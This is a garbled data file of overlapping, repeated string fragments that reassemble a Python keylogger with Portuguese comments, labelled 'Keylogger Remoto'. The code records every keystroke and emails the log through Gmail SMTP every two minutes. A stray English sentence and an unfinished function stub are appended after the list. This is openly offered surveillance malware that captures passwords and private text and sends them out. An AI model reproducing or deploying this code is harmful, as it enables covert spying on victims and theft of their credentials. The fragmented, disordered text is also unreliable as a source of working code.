"\"space\": # \" \"em vez de \"espaço\" name = \" \" elif name",
"porque on_release () iniciará o ouvinte em um thread separado self.semaphore.acquire() if __name__",
"> 1: # não é um caractere, tecla especial (por exemplo, ctrl, alt",
"contém o log de todos # as teclas dentro de \"self.interval\" self.log =",
"gerencia uma conexão com um servidor SMTP server = smtplib.SMTP(host=\"smtp.gmail.com\", port=587) # conectar-se",
"especial (por exemplo, ctrl, alt etc.) # maiúsculas com [] if name ==",
"sempre que um ENTER for pressionado name = \"[ENTER]\\n\" elif name == \"decimal\":",
"message): # gerencia uma conexão com um servidor SMTP server = smtplib.SMTP(host=\"smtp.gmail.com\", port=587)",
"= event.name if len(name) > 1: # não é um caractere, tecla especial",
"server.starttls() # faça login na conta de email server.login(email, password) # envie a",
"# gerencia uma conexão com um servidor SMTP server = smtplib.SMTP(host=\"smtp.gmail.com\", port=587) #",
"Semaphore, Timer SEND_REPORT_EVERY = 120 # 02 minutes EMAIL_ADDRESS = \"<seu_endereço_de_email>\" EMAIL_PASSWORD =",
"maiúsculas com [] if name == \"space\": # \" \"em vez de \"espaço\"",
"email server.login(email, password) # envie a mensagem real server.sendmail(email, email, message) # finaliza",
"com [] if name == \"space\": # \" \"em vez de \"espaço\" name",
"for pressionado name = \"[ENTER]\\n\" elif name == \"decimal\": name = \".\" else:",
"keylogs import smtplib # para enviar email usando o protocolo SMTP (gmail) #",
"(por exemplo, ctrl, alt etc.) # maiúsculas com [] if name == \"space\":",
"f\"[{name.upper()}]\" self.log += name def sendmail(self, email, password, message): # gerencia uma conexão",
"exemplo) \"\"\" name = event.name if len(name) > 1: # não é um",
"\"<seu_endereço_de_email>\" EMAIL_PASSWORD = \"<<PASSWORD>>\" class Keylogger: def __init__(self, interval): # passaremos SEND_REPORT_EVERY para",
"neste exemplo) \"\"\" name = event.name if len(name) > 1: # não é",
"ocorre porque on_release () iniciará o ouvinte em um thread separado self.semaphore.acquire() if",
"# para keylogs import smtplib # para enviar email usando o protocolo SMTP",
"on_release self.semaphore = Semaphore(0) def callback(self, event): \"\"\" Esse retorno de chamada é",
"finaliza a sessão server.quit() def report(self): \"\"\" Esta função é chamada todo \"self.interval\"",
"bloquear o segmento atual # O temporizador é para executar um método após",
"em um thread separado self.semaphore.acquire() if __name__ == \"__main__\": keylogger = Keylogger(interval=SEND_REPORT_EVERY) keylogger.start()",
"uma conexão com um servidor SMTP server = smtplib.SMTP(host=\"smtp.gmail.com\", port=587) # conectar-se ao",
"a relatar os keylogs self.report() # bloquear o segmento atual # desde on_release",
"se houver algo no log, relate-o self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log) # pode imprimir em",
"name = event.name if len(name) > 1: # não é um caractere, tecla",
"o segmento atual # O temporizador é para executar um método após uma",
"o que você quiser # imprimir(self.log) self.log = \"\" Timer(interval=self.interval, function=self.report).start() def start(self):",
"== \"enter\": # adicione uma nova linha sempre que um ENTER for pressionado",
"interval): # passaremos SEND_REPORT_EVERY para o intervalo self.interval = interval # esta é",
"(gmail) # O semáforo é para bloquear o segmento atual # O temporizador",
"por sublinhados name = name.replace(\" \", \"_\") name = f\"[{name.upper()}]\" self.log += name",
"name = name.replace(\" \", \"_\") name = f\"[{name.upper()}]\" self.log += name def sendmail(self,",
"\"\" # para bloquear após definir o ouvinte on_release self.semaphore = Semaphore(0) def",
"O temporizador é para executar um método após uma quantidade de tempo \"intervalo\"",
"SEND_REPORT_EVERY para o intervalo self.interval = interval # esta é a variável de",
"definir o ouvinte on_release self.semaphore = Semaphore(0) def callback(self, event): \"\"\" Esse retorno",
"keylogs e redefine a variável \"self.log\" \"\"\" if self.log: # se houver algo",
"houver algo no log, relate-o self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log) # pode imprimir em um",
"conexão com um servidor SMTP server = smtplib.SMTP(host=\"smtp.gmail.com\", port=587) # conectar-se ao servidor",
"# pode imprimir em um arquivo, o que você quiser # imprimir(self.log) self.log",
"\" elif name == \"enter\": # adicione uma nova linha sempre que um",
"que um evento de teclado ocorre (ou seja, quando uma chave é liberada",
"# se não o bloquearmos, quando executarmos o programa, nada acontecerá # isso",
"Esta função é chamada todo \"self.interval\" Ele basicamente envia keylogs e redefine a",
"desde on_release () não bloqueia o segmento atual # se não o bloquearmos,",
"smtplib # para enviar email usando o protocolo SMTP (gmail) # O semáforo",
"ocorre (ou seja, quando uma chave é liberada neste exemplo) \"\"\" name =",
"é chamado sempre que um evento de teclado ocorre (ou seja, quando uma",
"tecla especial (por exemplo, ctrl, alt etc.) # maiúsculas com [] if name",
"function=self.report).start() def start(self): # inicie o keylogger keyboard.on_release(callback=self.callback) # comece a relatar os",
"para o intervalo self.interval = interval # esta é a variável de string",
"port=587) # conectar-se ao servidor SMTP como modo TLS (por segurança) server.starttls() #",
"dentro de \"self.interval\" self.log = \"\" # para bloquear após definir o ouvinte",
"é para bloquear o segmento atual # O temporizador é para executar um",
"bloquear o segmento atual # desde on_release () não bloqueia o segmento atual",
"self.log) # pode imprimir em um arquivo, o que você quiser # imprimir(self.log)",
"que você quiser # imprimir(self.log) self.log = \"\" Timer(interval=self.interval, function=self.report).start() def start(self): #",
"imprimir(self.log) self.log = \"\" Timer(interval=self.interval, function=self.report).start() def start(self): # inicie o keylogger keyboard.on_release(callback=self.callback)",
"em um arquivo, o que você quiser # imprimir(self.log) self.log = \"\" Timer(interval=self.interval,",
"o keylogger keyboard.on_release(callback=self.callback) # comece a relatar os keylogs self.report() # bloquear o",
"email, password, message): # gerencia uma conexão com um servidor SMTP server =",
"não é um caractere, tecla especial (por exemplo, ctrl, alt etc.) # maiúsculas",
"= \"\" # para bloquear após definir o ouvinte on_release self.semaphore = Semaphore(0)",
"keylogger_remoto_py #Um Keylogger Remoto em Python import keyboard # para keylogs import smtplib",
"é a variável de string que contém o log de todos # as",
"uma chave é liberada neste exemplo) \"\"\" name = event.name if len(name) >",
"se não o bloquearmos, quando executarmos o programa, nada acontecerá # isso ocorre",
"elif name == \"enter\": # adicione uma nova linha sempre que um ENTER",
"= \"<<PASSWORD>>\" class Keylogger: def __init__(self, interval): # passaremos SEND_REPORT_EVERY para o intervalo",
"name == \"enter\": # adicione uma nova linha sempre que um ENTER for",
"envie a mensagem real server.sendmail(email, email, message) # finaliza a sessão server.quit() def",
"\".\" else: # substituir espaços por sublinhados name = name.replace(\" \", \"_\") name",
"executar um método após uma quantidade de tempo \"intervalo\" from threading import Semaphore,",
"e redefine a variável \"self.log\" \"\"\" if self.log: # se houver algo no",
"= Semaphore(0) def callback(self, event): \"\"\" Esse retorno de chamada é chamado sempre",
"segmento atual # se não o bloquearmos, quando executarmos o programa, nada acontecerá",
"sessão server.quit() def report(self): \"\"\" Esta função é chamada todo \"self.interval\" Ele basicamente",
"ouvinte em um thread separado self.semaphore.acquire() if __name__ == \"__main__\": keylogger = Keylogger(interval=SEND_REPORT_EVERY)",
"server = smtplib.SMTP(host=\"smtp.gmail.com\", port=587) # conectar-se ao servidor SMTP como modo TLS (por",
"# envie a mensagem real server.sendmail(email, email, message) # finaliza a sessão server.quit()",
"import smtplib # para enviar email usando o protocolo SMTP (gmail) # O",
"+= name def sendmail(self, email, password, message): # gerencia uma conexão com um",
"\"self.interval\" self.log = \"\" # para bloquear após definir o ouvinte on_release self.semaphore",
"programa, nada acontecerá # isso ocorre porque on_release () iniciará o ouvinte em",
"class Keylogger: def __init__(self, interval): # passaremos SEND_REPORT_EVERY para o intervalo self.interval =",
"a variável de string que contém o log de todos # as teclas",
"segmento atual # desde on_release () não bloqueia o segmento atual # se",
"# O semáforo é para bloquear o segmento atual # O temporizador é",
"seja, quando uma chave é liberada neste exemplo) \"\"\" name = event.name if",
"com um servidor SMTP server = smtplib.SMTP(host=\"smtp.gmail.com\", port=587) # conectar-se ao servidor SMTP",
"você quiser # imprimir(self.log) self.log = \"\" Timer(interval=self.interval, function=self.report).start() def start(self): # inicie",
"if self.log: # se houver algo no log, relate-o self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log) #",
"# \" \"em vez de \"espaço\" name = \" \" elif name ==",
"liberada neste exemplo) \"\"\" name = event.name if len(name) > 1: # não",
"é chamada todo \"self.interval\" Ele basicamente envia keylogs e redefine a variável \"self.log\"",
"a sessão server.quit() def report(self): \"\"\" Esta função é chamada todo \"self.interval\" Ele",
"password) # envie a mensagem real server.sendmail(email, email, message) # finaliza a sessão",
"# maiúsculas com [] if name == \"space\": # \" \"em vez de",
"retorno de chamada é chamado sempre que um evento de teclado ocorre (ou",
"Timer(interval=self.interval, function=self.report).start() def start(self): # inicie o keylogger keyboard.on_release(callback=self.callback) # comece a relatar",
"quando uma chave é liberada neste exemplo) \"\"\" name = event.name if len(name)",
"SMTP (gmail) # O semáforo é para bloquear o segmento atual # O",
"no log, relate-o self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log) # pode imprimir em um arquivo, o",
"semáforo é para bloquear o segmento atual # O temporizador é para executar",
"= 120 # 02 minutes EMAIL_ADDRESS = \"<seu_endereço_de_email>\" EMAIL_PASSWORD = \"<<PASSWORD>>\" class Keylogger:",
"para bloquear o segmento atual # O temporizador é para executar um método",
"= interval # esta é a variável de string que contém o log",
"\"enter\": # adicione uma nova linha sempre que um ENTER for pressionado name",
"self.log: # se houver algo no log, relate-o self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log) # pode",
"o programa, nada acontecerá # isso ocorre porque on_release () iniciará o ouvinte",
"server.quit() def report(self): \"\"\" Esta função é chamada todo \"self.interval\" Ele basicamente envia",
"self.report() # bloquear o segmento atual # desde on_release () não bloqueia o",
"def callback(self, event): \"\"\" Esse retorno de chamada é chamado sempre que um",
"é liberada neste exemplo) \"\"\" name = event.name if len(name) > 1: #",
"\"_\") name = f\"[{name.upper()}]\" self.log += name def sendmail(self, email, password, message): #",
"conta de email server.login(email, password) # envie a mensagem real server.sendmail(email, email, message)",
"nada acontecerá # isso ocorre porque on_release () iniciará o ouvinte em um",
"= f\"[{name.upper()}]\" self.log += name def sendmail(self, email, password, message): # gerencia uma",
"modo TLS (por segurança) server.starttls() # faça login na conta de email server.login(email,",
"\" \"em vez de \"espaço\" name = \" \" elif name == \"enter\":",
"(por segurança) server.starttls() # faça login na conta de email server.login(email, password) #",
"temporizador é para executar um método após uma quantidade de tempo \"intervalo\" from",
"é um caractere, tecla especial (por exemplo, ctrl, alt etc.) # maiúsculas com",
"uma nova linha sempre que um ENTER for pressionado name = \"[ENTER]\\n\" elif",
"como modo TLS (por segurança) server.starttls() # faça login na conta de email",
"# inicie o keylogger keyboard.on_release(callback=self.callback) # comece a relatar os keylogs self.report() #",
"import Semaphore, Timer SEND_REPORT_EVERY = 120 # 02 minutes EMAIL_ADDRESS = \"<seu_endereço_de_email>\" EMAIL_PASSWORD",
"de \"self.interval\" self.log = \"\" # para bloquear após definir o ouvinte on_release",
"executarmos o programa, nada acontecerá # isso ocorre porque on_release () iniciará o",
"em Python import keyboard # para keylogs import smtplib # para enviar email",
"# desde on_release () não bloqueia o segmento atual # se não o",
"de teclado ocorre (ou seja, quando uma chave é liberada neste exemplo) \"\"\"",
"keylogger keyboard.on_release(callback=self.callback) # comece a relatar os keylogs self.report() # bloquear o segmento",
"quando executarmos o programa, nada acontecerá # isso ocorre porque on_release () iniciará",
"de chamada é chamado sempre que um evento de teclado ocorre (ou seja,",
"quiser # imprimir(self.log) self.log = \"\" Timer(interval=self.interval, function=self.report).start() def start(self): # inicie o",
"# adicione uma nova linha sempre que um ENTER for pressionado name =",
"name == \"decimal\": name = \".\" else: # substituir espaços por sublinhados name",
"event): \"\"\" Esse retorno de chamada é chamado sempre que um evento de",
"\"\" Timer(interval=self.interval, function=self.report).start() def start(self): # inicie o keylogger keyboard.on_release(callback=self.callback) # comece a",
"uma quantidade de tempo \"intervalo\" from threading import Semaphore, Timer SEND_REPORT_EVERY = 120",
"tempo \"intervalo\" from threading import Semaphore, Timer SEND_REPORT_EVERY = 120 # 02 minutes",
"import keyboard # para keylogs import smtplib # para enviar email usando o",
"\", \"_\") name = f\"[{name.upper()}]\" self.log += name def sendmail(self, email, password, message):",
"= \"\" Timer(interval=self.interval, function=self.report).start() def start(self): # inicie o keylogger keyboard.on_release(callback=self.callback) # comece",
"vez de \"espaço\" name = \" \" elif name == \"enter\": # adicione",
"= name.replace(\" \", \"_\") name = f\"[{name.upper()}]\" self.log += name def sendmail(self, email,",
"o ouvinte em um thread separado self.semaphore.acquire() if __name__ == \"__main__\": keylogger =",
"sempre que um evento de teclado ocorre (ou seja, quando uma chave é",
"segurança) server.starttls() # faça login na conta de email server.login(email, password) # envie",
"\"self.log\" \"\"\" if self.log: # se houver algo no log, relate-o self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD,",
"name.replace(\" \", \"_\") name = f\"[{name.upper()}]\" self.log += name def sendmail(self, email, password,",
"def __init__(self, interval): # passaremos SEND_REPORT_EVERY para o intervalo self.interval = interval #",
"SMTP server = smtplib.SMTP(host=\"smtp.gmail.com\", port=587) # conectar-se ao servidor SMTP como modo TLS",
"name = \" \" elif name == \"enter\": # adicione uma nova linha",
"Timer SEND_REPORT_EVERY = 120 # 02 minutes EMAIL_ADDRESS = \"<seu_endereço_de_email>\" EMAIL_PASSWORD = \"<<PASSWORD>>\"",
"método após uma quantidade de tempo \"intervalo\" from threading import Semaphore, Timer SEND_REPORT_EVERY",
"Semaphore(0) def callback(self, event): \"\"\" Esse retorno de chamada é chamado sempre que",
"# 02 minutes EMAIL_ADDRESS = \"<seu_endereço_de_email>\" EMAIL_PASSWORD = \"<<PASSWORD>>\" class Keylogger: def __init__(self,",
"len(name) > 1: # não é um caractere, tecla especial (por exemplo, ctrl,",
"para bloquear após definir o ouvinte on_release self.semaphore = Semaphore(0) def callback(self, event):",
"\"intervalo\" from threading import Semaphore, Timer SEND_REPORT_EVERY = 120 # 02 minutes EMAIL_ADDRESS",
"variável de string que contém o log de todos # as teclas dentro",
"keyboard.on_release(callback=self.callback) # comece a relatar os keylogs self.report() # bloquear o segmento atual",
"(ou seja, quando uma chave é liberada neste exemplo) \"\"\" name = event.name",
"\"em vez de \"espaço\" name = \" \" elif name == \"enter\": #",
"redefine a variável \"self.log\" \"\"\" if self.log: # se houver algo no log,",
"na conta de email server.login(email, password) # envie a mensagem real server.sendmail(email, email,",
"comece a relatar os keylogs self.report() # bloquear o segmento atual # desde",
"após definir o ouvinte on_release self.semaphore = Semaphore(0) def callback(self, event): \"\"\" Esse",
"todo \"self.interval\" Ele basicamente envia keylogs e redefine a variável \"self.log\" \"\"\" if",
"#Um Keylogger Remoto em Python import keyboard # para keylogs import smtplib #",
"# comece a relatar os keylogs self.report() # bloquear o segmento atual #",
"minutes EMAIL_ADDRESS = \"<seu_endereço_de_email>\" EMAIL_PASSWORD = \"<<PASSWORD>>\" class Keylogger: def __init__(self, interval): #",
"ENTER for pressionado name = \"[ENTER]\\n\" elif name == \"decimal\": name = \".\"",
"de tempo \"intervalo\" from threading import Semaphore, Timer SEND_REPORT_EVERY = 120 # 02",
"Ele basicamente envia keylogs e redefine a variável \"self.log\" \"\"\" if self.log: #",
"o segmento atual # desde on_release () não bloqueia o segmento atual #",
"name == \"space\": # \" \"em vez de \"espaço\" name = \" \"",
"ctrl, alt etc.) # maiúsculas com [] if name == \"space\": # \"",
"função é chamada todo \"self.interval\" Ele basicamente envia keylogs e redefine a variável",
"# para enviar email usando o protocolo SMTP (gmail) # O semáforo é",
"ouvinte on_release self.semaphore = Semaphore(0) def callback(self, event): \"\"\" Esse retorno de chamada",
"# não é um caractere, tecla especial (por exemplo, ctrl, alt etc.) #",
"o intervalo self.interval = interval # esta é a variável de string que",
"name def sendmail(self, email, password, message): # gerencia uma conexão com um servidor",
"quantidade de tempo \"intervalo\" from threading import Semaphore, Timer SEND_REPORT_EVERY = 120 #",
"# faça login na conta de email server.login(email, password) # envie a mensagem",
"string que contém o log de todos # as teclas dentro de \"self.interval\"",
"sublinhados name = name.replace(\" \", \"_\") name = f\"[{name.upper()}]\" self.log += name def",
"name = \"[ENTER]\\n\" elif name == \"decimal\": name = \".\" else: # substituir",
"() iniciará o ouvinte em um thread separado self.semaphore.acquire() if __name__ == \"__main__\":",
"um ENTER for pressionado name = \"[ENTER]\\n\" elif name == \"decimal\": name =",
"def report(self): \"\"\" Esta função é chamada todo \"self.interval\" Ele basicamente envia keylogs",
"atual # desde on_release () não bloqueia o segmento atual # se não",
"keylogs self.report() # bloquear o segmento atual # desde on_release () não bloqueia",
"# imprimir(self.log) self.log = \"\" Timer(interval=self.interval, function=self.report).start() def start(self): # inicie o keylogger",
"relate-o self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log) # pode imprimir em um arquivo, o que você",
"== \"space\": # \" \"em vez de \"espaço\" name = \" \" elif",
"# bloquear o segmento atual # desde on_release () não bloqueia o segmento",
"caractere, tecla especial (por exemplo, ctrl, alt etc.) # maiúsculas com [] if",
"etc.) # maiúsculas com [] if name == \"space\": # \" \"em vez",
"# se houver algo no log, relate-o self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log) # pode imprimir",
"interval # esta é a variável de string que contém o log de",
"chamada é chamado sempre que um evento de teclado ocorre (ou seja, quando",
"self.log += name def sendmail(self, email, password, message): # gerencia uma conexão com",
"pode imprimir em um arquivo, o que você quiser # imprimir(self.log) self.log =",
"SEND_REPORT_EVERY = 120 # 02 minutes EMAIL_ADDRESS = \"<seu_endereço_de_email>\" EMAIL_PASSWORD = \"<<PASSWORD>>\" class",
"o ouvinte on_release self.semaphore = Semaphore(0) def callback(self, event): \"\"\" Esse retorno de",
"on_release () iniciará o ouvinte em um thread separado self.semaphore.acquire() if __name__ ==",
"teclas dentro de \"self.interval\" self.log = \"\" # para bloquear após definir o",
"# substituir espaços por sublinhados name = name.replace(\" \", \"_\") name = f\"[{name.upper()}]\"",
"chamado sempre que um evento de teclado ocorre (ou seja, quando uma chave",
"de todos # as teclas dentro de \"self.interval\" self.log = \"\" # para",
"email, message) # finaliza a sessão server.quit() def report(self): \"\"\" Esta função é",
"de \"espaço\" name = \" \" elif name == \"enter\": # adicione uma",
"imprimir em um arquivo, o que você quiser # imprimir(self.log) self.log = \"\"",
"elif name == \"decimal\": name = \".\" else: # substituir espaços por sublinhados",
"para keylogs import smtplib # para enviar email usando o protocolo SMTP (gmail)",
"O semáforo é para bloquear o segmento atual # O temporizador é para",
"a mensagem real server.sendmail(email, email, message) # finaliza a sessão server.quit() def report(self):",
"isso ocorre porque on_release () iniciará o ouvinte em um thread separado self.semaphore.acquire()",
"conectar-se ao servidor SMTP como modo TLS (por segurança) server.starttls() # faça login",
"de string que contém o log de todos # as teclas dentro de",
"on_release () não bloqueia o segmento atual # se não o bloquearmos, quando",
"evento de teclado ocorre (ou seja, quando uma chave é liberada neste exemplo)",
"# as teclas dentro de \"self.interval\" self.log = \"\" # para bloquear após",
"chave é liberada neste exemplo) \"\"\" name = event.name if len(name) > 1:",
"os keylogs self.report() # bloquear o segmento atual # desde on_release () não",
"message) # finaliza a sessão server.quit() def report(self): \"\"\" Esta função é chamada",
"# conectar-se ao servidor SMTP como modo TLS (por segurança) server.starttls() # faça",
"segmento atual # O temporizador é para executar um método após uma quantidade",
"[] if name == \"space\": # \" \"em vez de \"espaço\" name =",
"__init__(self, interval): # passaremos SEND_REPORT_EVERY para o intervalo self.interval = interval # esta",
"passaremos SEND_REPORT_EVERY para o intervalo self.interval = interval # esta é a variável",
"# esta é a variável de string que contém o log de todos",
"report(self): \"\"\" Esta função é chamada todo \"self.interval\" Ele basicamente envia keylogs e",
"1: # não é um caractere, tecla especial (por exemplo, ctrl, alt etc.)",
"\"\"\" Esse retorno de chamada é chamado sempre que um evento de teclado",
"if name == \"space\": # \" \"em vez de \"espaço\" name = \"",
"sendmail(self, email, password, message): # gerencia uma conexão com um servidor SMTP server",
"= smtplib.SMTP(host=\"smtp.gmail.com\", port=587) # conectar-se ao servidor SMTP como modo TLS (por segurança)",
"espaços por sublinhados name = name.replace(\" \", \"_\") name = f\"[{name.upper()}]\" self.log +=",
"um evento de teclado ocorre (ou seja, quando uma chave é liberada neste",
"iniciará o ouvinte em um thread separado self.semaphore.acquire() if __name__ == \"__main__\": keylogger",
"um servidor SMTP server = smtplib.SMTP(host=\"smtp.gmail.com\", port=587) # conectar-se ao servidor SMTP como",
"\"<<PASSWORD>>\" class Keylogger: def __init__(self, interval): # passaremos SEND_REPORT_EVERY para o intervalo self.interval",
"password, message): # gerencia uma conexão com um servidor SMTP server = smtplib.SMTP(host=\"smtp.gmail.com\",",
"\"espaço\" name = \" \" elif name == \"enter\": # adicione uma nova",
"callback(self, event): \"\"\" Esse retorno de chamada é chamado sempre que um evento",
"# para bloquear após definir o ouvinte on_release self.semaphore = Semaphore(0) def callback(self,",
"() não bloqueia o segmento atual # se não o bloquearmos, quando executarmos",
"# passaremos SEND_REPORT_EVERY para o intervalo self.interval = interval # esta é a",
"login na conta de email server.login(email, password) # envie a mensagem real server.sendmail(email,",
"name = \".\" else: # substituir espaços por sublinhados name = name.replace(\" \",",
"Python import keyboard # para keylogs import smtplib # para enviar email usando",
"SMTP como modo TLS (por segurança) server.starttls() # faça login na conta de",
"= \".\" else: # substituir espaços por sublinhados name = name.replace(\" \", \"_\")",
"log de todos # as teclas dentro de \"self.interval\" self.log = \"\" #",
"email usando o protocolo SMTP (gmail) # O semáforo é para bloquear o",
"que contém o log de todos # as teclas dentro de \"self.interval\" self.log",
"adicione uma nova linha sempre que um ENTER for pressionado name = \"[ENTER]\\n\"",
"um thread separado self.semaphore.acquire() if __name__ == \"__main__\": keylogger = Keylogger(interval=SEND_REPORT_EVERY) keylogger.start() #by",
"name = f\"[{name.upper()}]\" self.log += name def sendmail(self, email, password, message): # gerencia",
"protocolo SMTP (gmail) # O semáforo é para bloquear o segmento atual #",
"# isso ocorre porque on_release () iniciará o ouvinte em um thread separado",
"= \" \" elif name == \"enter\": # adicione uma nova linha sempre",
"substituir espaços por sublinhados name = name.replace(\" \", \"_\") name = f\"[{name.upper()}]\" self.log",
"acontecerá # isso ocorre porque on_release () iniciará o ouvinte em um thread",
"EMAIL_PASSWORD = \"<<PASSWORD>>\" class Keylogger: def __init__(self, interval): # passaremos SEND_REPORT_EVERY para o",
"intervalo self.interval = interval # esta é a variável de string que contém",
"\"\"\" if self.log: # se houver algo no log, relate-o self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log)",
"= \"[ENTER]\\n\" elif name == \"decimal\": name = \".\" else: # substituir espaços",
"self.log = \"\" # para bloquear após definir o ouvinte on_release self.semaphore =",
"um caractere, tecla especial (por exemplo, ctrl, alt etc.) # maiúsculas com []",
"self.log = \"\" Timer(interval=self.interval, function=self.report).start() def start(self): # inicie o keylogger keyboard.on_release(callback=self.callback) #",
"smtplib.SMTP(host=\"smtp.gmail.com\", port=587) # conectar-se ao servidor SMTP como modo TLS (por segurança) server.starttls()",
"EMAIL_ADDRESS = \"<seu_endereço_de_email>\" EMAIL_PASSWORD = \"<<PASSWORD>>\" class Keylogger: def __init__(self, interval): # passaremos",
"def start(self): # inicie o keylogger keyboard.on_release(callback=self.callback) # comece a relatar os keylogs",
"não bloqueia o segmento atual # se não o bloquearmos, quando executarmos o",
"Keylogger: def __init__(self, interval): # passaremos SEND_REPORT_EVERY para o intervalo self.interval = interval",
"event.name if len(name) > 1: # não é um caractere, tecla especial (por",
"a variável \"self.log\" \"\"\" if self.log: # se houver algo no log, relate-o",
"\" \" elif name == \"enter\": # adicione uma nova linha sempre que",
"enviar email usando o protocolo SMTP (gmail) # O semáforo é para bloquear",
"== \"decimal\": name = \".\" else: # substituir espaços por sublinhados name =",
"basicamente envia keylogs e redefine a variável \"self.log\" \"\"\" if self.log: # se",
"TLS (por segurança) server.starttls() # faça login na conta de email server.login(email, password)",
"o bloquearmos, quando executarmos o programa, nada acontecerá # isso ocorre porque on_release",
"que um ENTER for pressionado name = \"[ENTER]\\n\" elif name == \"decimal\": name",
"exemplo, ctrl, alt etc.) # maiúsculas com [] if name == \"space\": #",
"\"\"\" name = event.name if len(name) > 1: # não é um caractere,",
"mensagem real server.sendmail(email, email, message) # finaliza a sessão server.quit() def report(self): \"\"\"",
"log, relate-o self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log) # pode imprimir em um arquivo, o que",
"thread separado self.semaphore.acquire() if __name__ == \"__main__\": keylogger = Keylogger(interval=SEND_REPORT_EVERY) keylogger.start() #by Herik_Carvalho",
"server.sendmail(email, email, message) # finaliza a sessão server.quit() def report(self): \"\"\" Esta função",
"start(self): # inicie o keylogger keyboard.on_release(callback=self.callback) # comece a relatar os keylogs self.report()",
"nova linha sempre que um ENTER for pressionado name = \"[ENTER]\\n\" elif name",
"threading import Semaphore, Timer SEND_REPORT_EVERY = 120 # 02 minutes EMAIL_ADDRESS = \"<seu_endereço_de_email>\"",
"\"decimal\": name = \".\" else: # substituir espaços por sublinhados name = name.replace(\"",
"Remoto em Python import keyboard # para keylogs import smtplib # para enviar",
"else: # substituir espaços por sublinhados name = name.replace(\" \", \"_\") name =",
"self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log) # pode imprimir em um arquivo, o que você quiser",
"para executar um método após uma quantidade de tempo \"intervalo\" from threading import",
"120 # 02 minutes EMAIL_ADDRESS = \"<seu_endereço_de_email>\" EMAIL_PASSWORD = \"<<PASSWORD>>\" class Keylogger: def",
"servidor SMTP como modo TLS (por segurança) server.starttls() # faça login na conta",
"arquivo, o que você quiser # imprimir(self.log) self.log = \"\" Timer(interval=self.interval, function=self.report).start() def",
"chamada todo \"self.interval\" Ele basicamente envia keylogs e redefine a variável \"self.log\" \"\"\"",
"o protocolo SMTP (gmail) # O semáforo é para bloquear o segmento atual",
"o segmento atual # se não o bloquearmos, quando executarmos o programa, nada",
"= \"<seu_endereço_de_email>\" EMAIL_PASSWORD = \"<<PASSWORD>>\" class Keylogger: def __init__(self, interval): # passaremos SEND_REPORT_EVERY",
"as teclas dentro de \"self.interval\" self.log = \"\" # para bloquear após definir",
"é para executar um método após uma quantidade de tempo \"intervalo\" from threading",
"não o bloquearmos, quando executarmos o programa, nada acontecerá # isso ocorre porque",
"self.semaphore = Semaphore(0) def callback(self, event): \"\"\" Esse retorno de chamada é chamado",
"ao servidor SMTP como modo TLS (por segurança) server.starttls() # faça login na",
"# keylogger_remoto_py #Um Keylogger Remoto em Python import keyboard # para keylogs import",
"02 minutes EMAIL_ADDRESS = \"<seu_endereço_de_email>\" EMAIL_PASSWORD = \"<<PASSWORD>>\" class Keylogger: def __init__(self, interval):",
"self.interval = interval # esta é a variável de string que contém o",
"teclado ocorre (ou seja, quando uma chave é liberada neste exemplo) \"\"\" name",
"EMAIL_PASSWORD, self.log) # pode imprimir em um arquivo, o que você quiser #",
"real server.sendmail(email, email, message) # finaliza a sessão server.quit() def report(self): \"\"\" Esta",
"def sendmail(self, email, password, message): # gerencia uma conexão com um servidor SMTP",
"atual # O temporizador é para executar um método após uma quantidade de",
"esta é a variável de string que contém o log de todos #",
"usando o protocolo SMTP (gmail) # O semáforo é para bloquear o segmento",
"keyboard # para keylogs import smtplib # para enviar email usando o protocolo",
"Keylogger Remoto em Python import keyboard # para keylogs import smtplib # para",
"if len(name) > 1: # não é um caractere, tecla especial (por exemplo,",
"\"\"\" Esta função é chamada todo \"self.interval\" Ele basicamente envia keylogs e redefine",
"envia keylogs e redefine a variável \"self.log\" \"\"\" if self.log: # se houver",
"algo no log, relate-o self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log) # pode imprimir em um arquivo,",
"bloquear após definir o ouvinte on_release self.semaphore = Semaphore(0) def callback(self, event): \"\"\"",
"\"[ENTER]\\n\" elif name == \"decimal\": name = \".\" else: # substituir espaços por",
"o log de todos # as teclas dentro de \"self.interval\" self.log = \"\"",
"relatar os keylogs self.report() # bloquear o segmento atual # desde on_release ()",
"Esse retorno de chamada é chamado sempre que um evento de teclado ocorre",
"faça login na conta de email server.login(email, password) # envie a mensagem real",
"após uma quantidade de tempo \"intervalo\" from threading import Semaphore, Timer SEND_REPORT_EVERY =",
"inicie o keylogger keyboard.on_release(callback=self.callback) # comece a relatar os keylogs self.report() # bloquear",
"atual # se não o bloquearmos, quando executarmos o programa, nada acontecerá #",
"server.login(email, password) # envie a mensagem real server.sendmail(email, email, message) # finaliza a",
"from threading import Semaphore, Timer SEND_REPORT_EVERY = 120 # 02 minutes EMAIL_ADDRESS =",
"servidor SMTP server = smtplib.SMTP(host=\"smtp.gmail.com\", port=587) # conectar-se ao servidor SMTP como modo",
"alt etc.) # maiúsculas com [] if name == \"space\": # \" \"em",
"# O temporizador é para executar um método após uma quantidade de tempo",
"bloqueia o segmento atual # se não o bloquearmos, quando executarmos o programa,",
"um arquivo, o que você quiser # imprimir(self.log) self.log = \"\" Timer(interval=self.interval, function=self.report).start()",
"todos # as teclas dentro de \"self.interval\" self.log = \"\" # para bloquear",
"# finaliza a sessão server.quit() def report(self): \"\"\" Esta função é chamada todo",
"de email server.login(email, password) # envie a mensagem real server.sendmail(email, email, message) #",
"para enviar email usando o protocolo SMTP (gmail) # O semáforo é para",
"\"self.interval\" Ele basicamente envia keylogs e redefine a variável \"self.log\" \"\"\" if self.log:",
"pressionado name = \"[ENTER]\\n\" elif name == \"decimal\": name = \".\" else: #",
"bloquearmos, quando executarmos o programa, nada acontecerá # isso ocorre porque on_release ()"
] |
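A minimal sketch of the same Timer-plus-Semaphore pattern in isolation, without the keyboard hook, to make the threading comments above concrete; the two-second interval and the print are placeholders, and the sketch runs until the process is interrupted, just as the keylogger does.

from threading import Semaphore, Timer

def report(interval):
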